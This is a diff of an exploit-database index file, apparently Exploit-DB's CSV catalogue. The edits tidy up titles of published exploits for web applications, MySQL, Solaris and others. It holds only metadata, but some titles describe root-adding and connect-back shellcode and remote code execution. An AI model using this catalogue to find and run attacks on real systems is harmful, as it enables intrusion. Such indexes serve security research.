34311,platforms/solaris/local/34311.sh,"Oracle Solaris 8/9/10 - 'flar' Insecure Temporary File Creation",2010-07-12,"Frank Stuart",solaris,local,0 -34312,platforms/multiple/remote/34312.txt,"Oracle WebLogic Server <= 10.3.3 Encoded URL Remote",2010-07-13,"Timothy D. Morgan",multiple,remote,0 +34312,platforms/multiple/remote/34312.txt,"Oracle WebLogic Server 10.3.3 Encoded URL Remote",2010-07-13,"Timothy D. Morgan",multiple,remote,0 34313,platforms/solaris/local/34313.txt,"Oracle Solaris 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0 34314,platforms/solaris/local/34314.sh,"Oracle Solaris Management Console WBEM Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0 34315,platforms/php/webapps/34315.txt,"The Next Generation of Genealogy Sitebuilding 'searchform.php' Cross-Site Scripting",2009-12-14,bi0,php,webapps,0 @@ -30926,7 +30926,7 @@ id,file,description,date,author,platform,type,port 34319,platforms/php/webapps/34319.txt,"Ez Cart 'index.php' Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0 34320,platforms/php/webapps/34320.txt,"GetSimple CMS 2.01 admin/template/error_checking.php Multiple Parameter XSS",2010-07-15,Leonard,php,webapps,0 34321,platforms/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities",2010-07-15,"Nijel the Destroyer",php,webapps,0 -34322,platforms/php/webapps/34322.txt,"phpwcms <= 1.4.5 - 'phpwcms.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 +34322,platforms/php/webapps/34322.txt,"phpwcms 1.4.5 - 'phpwcms.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34324,platforms/php/webapps/34324.txt,"FestOS 2.3 - 'contents' Parameter Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34499,platforms/php/webapps/34499.txt,"ViArt Helpdesk products_search.php search_category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 @@ -30940,12 +30940,12 @@ id,file,description,date,author,platform,type,port 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,Metasploit,windows,remote,8020 34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Parameter Remote Command Execution",2010-07-18,"Marshall Whittaker",cgi,webapps,0 34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0 -34349,platforms/php/webapps/34349.txt,"Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Include",2010-07-18,eidelweiss,php,webapps,0 +34349,platforms/php/webapps/34349.txt,"Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion",2010-07-18,eidelweiss,php,webapps,0 34350,platforms/php/webapps/34350.txt,"Sourcefabric Campsite Articles HTML Injection",2010-07-15,D4rk357,php,webapps,0 34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 beta - 'uid' Parameter SQL Injection",2010-07-19,"Dinesh Arora",php,webapps,0 -34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 - 'main.php' Multiple Local File Include Vulnerabilities",2009-12-14,Packetdeath,php,webapps,0 +34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 - 'main.php' Multiple Local File Inclusion Vulnerabilities",2009-12-14,Packetdeath,php,webapps,0 34355,platforms/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial Of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos,0 34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 - Remote Buffer Overflow",2009-12-12,"Razuel Akaharnath",linux,dos,0 34357,platforms/php/webapps/34357.txt,"ScriptsEz Ez FAQ Maker 1.0 - Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0 @@ -30953,7 +30953,7 @@ id,file,description,date,author,platform,type,port 34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 - Cross-Site Request Forgery",2010-07-20,anonymous,windows,dos,0 34360,platforms/multiple/dos/34360.txt,"Monolith Lithtech Game Engine - Memory Corruption",2010-07-21,"Luigi Auriemma",multiple,dos,0 34361,platforms/hardware/webapps/34361.txt,"Tenda A5s Router 3.02.05_CN - Authentication Bypass",2014-08-18,zixian,hardware,webapps,80 -34364,platforms/linux/dos/34364.html,"Qt <= 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption",2010-07-13,D4rk357,linux,dos,0 +34364,platforms/linux/dos/34364.html,"Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption",2010-07-13,D4rk357,linux,dos,0 34365,platforms/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",php,webapps,0 34366,platforms/php/webapps/34366.txt,"Stratek Web Design Twilight CMS 4.0 - 'calendar' Cross-Site Scripting",2009-11-02,"Vladimir Vorontsov",php,webapps,0 34367,platforms/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps,0 @@ -30972,9 +30972,9 @@ id,file,description,date,author,platform,type,port 34381,platforms/php/webapps/34381.txt,"MyBB 1.8 Beta 3 - Multiple Vulnerabilities",2014-08-21,"DemoLisH B3yaZ",php,webapps,0 34466,platforms/php/webapps/34466.txt,"CMS Source Multiple Input Validation Vulnerabilities",2010-08-13,"High-Tech Bridge SA",php,webapps,0 34465,platforms/hardware/remote/34465.txt,"F5 Big-IP - Unauthenticated rsync Access",2014-08-29,Security-Assessment.com,hardware,remote,22 -34383,platforms/php/webapps/34383.txt,"Social Media 'index.php' Local File Include",2010-07-27,"Harri Johansson",php,webapps,0 +34383,platforms/php/webapps/34383.txt,"Social Media 'index.php' Local File Inclusion",2010-07-27,"Harri Johansson",php,webapps,0 34384,platforms/jsp/webapps/34384.txt,"Jira 4.0.1 - Cross-Site Scripting and Information Disclosure Vulnerabilities",2010-07-28,MaXe,jsp,webapps,0 -34385,platforms/linux/remote/34385.txt,"KVIrc <= 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution",2010-07-28,unic0rn,linux,remote,0 +34385,platforms/linux/remote/34385.txt,"KVIrc 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution",2010-07-28,unic0rn,linux,remote,0 34386,platforms/php/webapps/34386.txt,"Cetera eCommerce Multiple SQL Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0 34387,platforms/php/webapps/34387.txt,"Cetera eCommerce Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0 34388,platforms/php/webapps/34388.txt,"SPIP 2.1 - 'var_login' Parameter Cross-Site Scripting",2010-07-28,dotsafe.fr,php,webapps,0 @@ -30992,7 +30992,7 @@ id,file,description,date,author,platform,type,port 34399,platforms/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",ios,remote,0 34400,platforms/php/webapps/34400.txt,"RaidenTunes 'music_out.php' Cross-Site Scripting",2014-08-03,LiquidWorm,php,webapps,0 34401,platforms/php/webapps/34401.txt,"PHP168 Template Editor 'filename' Parameter Directory Traversal",2009-10-04,esnra,php,webapps,0 -34402,platforms/php/webapps/34402.txt,"OpenSolution Quick.Cart Local File Include and Cross-Site Scripting Vulnerabilities",2009-10-08,kl3ryk,php,webapps,0 +34402,platforms/php/webapps/34402.txt,"OpenSolution Quick.Cart Local File Inclusion and Cross-Site Scripting Vulnerabilities",2009-10-08,kl3ryk,php,webapps,0 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 34405,platforms/php/webapps/34405.txt,"PHP Stock Management System 1.02 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-08-25,"Ragha Deepthi K R",php,webapps,0 @@ -31080,12 +31080,12 @@ id,file,description,date,author,platform,type,port 34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me 'answers.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow",2009-08-09,"lvac lvac",windows,dos,0 34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection",2010-08-19,indoushka,php,webapps,0 -34504,platforms/php/webapps/34504.txt,"Cacti <= 0.8.7 on Red Hat High Performance Computing (HPC) utilities.php filter Parameter XSS",2010-08-19,"Marc Schoenefeld",php,webapps,0 -34505,platforms/php/dos/34505.txt,"MySQL <= 5.1.48 - 'TEMPORARY InnoDB' Tables Denial Of Service",2010-08-19,"Boris Reisig",php,dos,0 -34506,platforms/linux/dos/34506.txt,"MySQL <= 5.1.48 - 'EXPLAIN' Denial Of Service",2010-08-20,"Bjorn Munch",linux,dos,0 +34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 on Red Hat High Performance Computing (HPC) utilities.php filter Parameter XSS",2010-08-19,"Marc Schoenefeld",php,webapps,0 +34505,platforms/php/dos/34505.txt,"MySQL 5.1.48 - 'TEMPORARY InnoDB' Tables Denial Of Service",2010-08-19,"Boris Reisig",php,dos,0 +34506,platforms/linux/dos/34506.txt,"MySQL 5.1.48 - 'EXPLAIN' Denial Of Service",2010-08-20,"Bjorn Munch",linux,dos,0 34507,platforms/linux/remote/34507.txt,"Nagios XI 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 -34510,platforms/linux/dos/34510.txt,"OraclMySQL <= 5.1.48 - 'LOAD DATA INFILE' Denial Of Service",2010-08-20,"Elena Stepanova",linux,dos,0 +34510,platforms/linux/dos/34510.txt,"OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial Of Service",2010-08-20,"Elena Stepanova",linux,dos,0 34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes (admin-ajax.php img param) - Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Stored XSS",2014-09-01,"Prakhar Prasad",multiple,webapps,0 @@ -31094,13 +31094,13 @@ id,file,description,date,author,platform,type,port 34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / RCE",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash PoC",2014-12-23,"Drozdova Liudmila",windows,dos,0 -34520,platforms/linux/dos/34520.txt,"Oracle MySQL <= 5.1.48 - 'HANDLER' interface Denial Of Service",2010-08-20,"Matthias Leich",linux,dos,0 +34520,platforms/linux/dos/34520.txt,"Oracle MySQL 5.1.48 - 'HANDLER' interface Denial Of Service",2010-08-20,"Matthias Leich",linux,dos,0 34521,platforms/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial Of Service",2010-08-20,"Shane Bester",linux,dos,0 34522,platforms/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial Of Service",2010-07-09,"Elena Stepanova",linux,dos,0 34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection",2010-08-24,"Adam Baldwin",multiple,remote,0 34524,platforms/php/webapps/34524.txt,"WordPress Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0 -34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 3.4 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0 +34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker 3.4 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0 34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution",2010-08-25,storm,windows,remote,0 34684,platforms/php/webapps/34684.pl,"Joomla Spain Component - 'nv' Parameter SQL Injection",2010-09-20,FL0RiX,php,webapps,0 34530,platforms/windows/dos/34530.py,"Crystal Player 1.98 - (.mls) Buffer Overflow",2010-08-20,"Praveen Darshanam",windows,dos,0 @@ -31131,14 +31131,14 @@ id,file,description,date,author,platform,type,port 34558,platforms/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 - Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 34559,platforms/php/webapps/34559.txt,"Rumba XML 2.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 34560,platforms/php/webapps/34560.html,"ArtGK CMS Cross-Site Scripting and HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 -34561,platforms/php/webapps/34561.txt,"KingCMS 0.6 - 'CONFIG[AdminPath]' Parameter Remote File Include",2009-09-07,Securitylab.ir,php,webapps,0 +34561,platforms/php/webapps/34561.txt,"KingCMS 0.6 - 'CONFIG[AdminPath]' Parameter Remote File Inclusion",2009-09-07,Securitylab.ir,php,webapps,0 34562,platforms/php/webapps/34562.txt,"AdaptBB 1.0 - 'q' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 - 'index.php' Cross-Site Scripting",2010-09-02,anT!-Tr0J4n,php,webapps,0 34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro 'c.php' SQL Injection",2010-09-02,MustLive,php,webapps,0 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80 34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 -34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 +34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 34572,platforms/php/webapps/34572.txt,"WordPress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0 34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.X - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.X - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80 @@ -31149,23 +31149,23 @@ id,file,description,date,author,platform,type,port 34585,platforms/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443 34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80 34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090 -34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0 +34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,aix,dos,0 34589,platforms/php/webapps/34589.txt,"WordPress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - Obfuscated Shellcode chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User _ALI_ & Execute /bin/bash (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 34593,platforms/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,php,webapps,0 34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 - Remote Root Code Execution",2014-09-09,eF,linux,remote,80 -34603,platforms/windows/dos/34603.py,"Adobe Acrobat and Reader <= 9.3.4 - 'acroform_PlugInMain' Memory Corruption",2010-09-06,ITSecTeam,windows,dos,0 +34603,platforms/windows/dos/34603.py,"Adobe Acrobat and Reader 9.3.4 - 'acroform_PlugInMain' Memory Corruption",2010-09-06,ITSecTeam,windows,dos,0 34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross-Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0 34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site Cross-Site Scripting",2010-09-10,Moudi,php,webapps,0 -34598,platforms/php/webapps/34598.txt,"SZNews 2.7 - 'printnews.php3' Remote File Include",2009-09-11,"kurdish hackers team",php,webapps,0 +34598,platforms/php/webapps/34598.txt,"SZNews 2.7 - 'printnews.php3' Remote File Inclusion",2009-09-11,"kurdish hackers team",php,webapps,0 34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook 'hotel_id' Parameter Multiple SQL Injection Vulnerabilities",2009-09-10,Mr.SQL,php,webapps,0 34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure",2010-09-06,"Chris Evans",windows,dos,0 -34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting",2010-09-06,"Moritz Naumann",php,webapps,0 +34605,platforms/php/webapps/34605.txt,"Horde Application Framework 3.3.8 - 'icon_browser.php' Cross-Site Scripting",2010-09-06,"Moritz Naumann",php,webapps,0 34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting",2009-09-02,Moudi,php,webapps,0 -34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0 -34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include",2010-09-06,"MiND C0re",php,webapps,0 +34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Inclusion and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0 +34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Inclusion",2010-09-06,"MiND C0re",php,webapps,0 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0 34610,platforms/php/webapps/34610.txt,"zenphoto 1.3 zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0 34611,platforms/php/webapps/34611.txt,"Zenphoto 1.3 zp-core/admin.php Multiple Parameter XSS",2010-09-07,"Bogdan Calin",php,webapps,0 @@ -31180,7 +31180,7 @@ id,file,description,date,author,platform,type,port 34618,platforms/php/webapps/34618.txt,"Omnistar Recruiting 'resume_register.php' Cross-Site Scripting",2009-09-06,MizoZ,php,webapps,0 34619,platforms/php/webapps/34619.txt,"PaysiteReviewCMS 1.1 - search.php q Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0 -34621,platforms/unix/remote/34621.c,"Mozilla Firefox <= 3.6.8 - 'Math.random()' Cross Domain Information Disclosure",2010-09-14,"Amit Klein",unix,remote,0 +34621,platforms/unix/remote/34621.c,"Mozilla Firefox 3.6.8 - 'Math.random()' Cross Domain Information Disclosure",2010-09-14,"Amit Klein",unix,remote,0 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",windows,remote,0 34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS",2014-09-11,Provensec,php,webapps,80 @@ -31195,8 +31195,8 @@ id,file,description,date,author,platform,type,port 34633,platforms/php/webapps/34633.txt,"Spiceworks 'query' Parameter Cross-Site Scripting",2009-08-08,"Adam Baldwin",php,webapps,0 34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0 34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection",2009-08-06,"599eme Man",php,webapps,0 -34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Include",2010-09-15,"John Leitch",php,webapps,0 -34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 - Local File Include",2010-09-15,"John Leitch",php,webapps,0 +34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Inclusion",2010-09-15,"John Leitch",php,webapps,0 +34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 - Local File Inclusion",2010-09-15,"John Leitch",php,webapps,0 34640,platforms/php/webapps/34640.txt,"Mollify 1.6 - 'index.php' Cross-Site Scripting",2010-09-15,"John Leitch",php,webapps,0 34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 - Arbitrary File Upload",2010-09-15,"John Leitch",php,webapps,0 34642,platforms/php/webapps/34642.txt,"AJ Auction Pro OOPD 3.0 - 'txtkeyword' Parameter Cross-Site Scripting",2009-08-06,"599eme Man",php,webapps,0 @@ -31222,10 +31222,10 @@ id,file,description,date,author,platform,type,port 34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b lyrics.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0 34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b adult/video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0 34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution & File Include",2014-09-15,Vulnerability-Lab,ios,webapps,0 -34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80 +34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80 -34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,Metasploit,multiple,remote,80 +34669,platforms/multiple/remote/34669.rb,"Railo Remote File Inclusion",2014-09-15,Metasploit,multiple,remote,80 34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,Metasploit,multiple,remote,8400 34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,Metasploit,java,remote,9000 34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - CSRF",2014-09-15,"William Costa",linux,webapps,8090 @@ -31244,7 +31244,7 @@ id,file,description,date,author,platform,type,port 34687,platforms/asp/webapps/34687.txt,"Smart ASP Survey 'catid' SQL Injection",2009-08-27,Moudi,asp,webapps,0 34688,platforms/php/webapps/34688.txt,"Basilic 1.5.13 - 'index.php' Cross-Site Scripting",2009-07-27,PLATEN,php,webapps,0 34689,platforms/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injection Vulnerabilities",2009-08-27,Evil-Cod3r,php,webapps,0 -34690,platforms/php/webapps/34690.txt,"@Mail <= 6.1.9 - 'MailType' Parameter Cross-Site Scripting",2010-09-21,"Vicente Aguilera Diaz",php,webapps,0 +34690,platforms/php/webapps/34690.txt,"@Mail 6.1.9 - 'MailType' Parameter Cross-Site Scripting",2010-09-21,"Vicente Aguilera Diaz",php,webapps,0 34691,platforms/multiple/remote/34691.txt,"CollabNet Subversion Edge Log Parser - HTML Injection",2010-09-21,"Sumit Kumar Soni",multiple,remote,0 34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM 'searchstring' Parameter Cross-Site Scripting",2009-07-27,u.f.,php,webapps,0 34693,platforms/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Field Cross-Site Scripting",2009-08-27,"599eme Man",php,webapps,0 @@ -31254,13 +31254,13 @@ id,file,description,date,author,platform,type,port 34697,platforms/windows/remote/34697.c,"Sothink SWF Decompiler - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote,0 34698,platforms/windows/dos/34698.txt,"Microsoft Excel 2002 - Memory Corruption",2010-09-23,Abysssec,windows,dos,0 34699,platforms/php/webapps/34699.txt,"OpenText LiveLink 9.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-09-23,"Alejandro Ramos",php,webapps,0 -34700,platforms/php/webapps/34700.txt,"WebShop Hun 1.062s 'index.php' Local File Include and Cross-Site Scripting Vulnerabilities",2009-07-24,u.f.,php,webapps,0 +34700,platforms/php/webapps/34700.txt,"WebShop Hun 1.062s 'index.php' Local File Inclusion and Cross-Site Scripting Vulnerabilities",2009-07-24,u.f.,php,webapps,0 34701,platforms/php/webapps/34701.txt,"SkaLinks 1.5 - 'cat' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-07-24,Moudi,php,webapps,0 34702,platforms/php/webapps/34702.txt,"TurnkeySetup Net Marketing 6.0 - 'faqs.php' Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0 34703,platforms/php/webapps/34703.txt,"Million Dollar Pixel Ads Cross-Site Scripting and SQL Injection Vulnerabilities",2009-07-24,Moudi,php,webapps,0 34704,platforms/php/webapps/34704.txt,"MyDLstore Pixel Ad Script 'payment.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 34705,platforms/php/webapps/34705.txt,"APBook 1.3 Admin Login Multiple SQL Injection Vulnerabilities",2009-07-21,n3w7u,php,webapps,0 -34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 - 'url' Parameter Remote File Include",2009-07-21,Moudi,php,webapps,0 +34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 - 'url' Parameter Remote File Inclusion",2009-07-21,Moudi,php,webapps,0 34707,platforms/php/webapps/34707.txt,"RadAFFILIATE Links 'index.php' Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 34708,platforms/php/webapps/34708.pl,"Joomla! 'com_tax' Component - 'eid' Parameter SQL Injection",2010-09-23,FL0RiX,php,webapps,0 34709,platforms/php/webapps/34709.txt,"Astrology 'celebrities.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 @@ -31289,7 +31289,7 @@ id,file,description,date,author,platform,type,port 34733,platforms/php/webapps/34733.txt,"DragDropCart search.php search Parameter XSS",2009-07-20,Moudi,php,webapps,0 34734,platforms/php/webapps/34734.txt,"DragDropCart login.php redirect Parameter XSS",2009-07-20,Moudi,php,webapps,0 34735,platforms/php/webapps/34735.txt,"DragDropCart productdetail.php product Parameter XSS",2009-07-20,Moudi,php,webapps,0 -34729,platforms/windows/dos/34729.py,"Seafile-server <= 3.1.5 - Remote DoS",2014-09-20,"nop nop",windows,dos,0 +34729,platforms/windows/dos/34729.py,"Seafile-server 3.1.5 - Remote DoS",2014-09-20,"nop nop",windows,dos,0 34736,platforms/php/webapps/34736.txt,"EZArticles 'articles.php' Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 34737,platforms/php/webapps/34737.txt,"EZodiak \'index.php\' 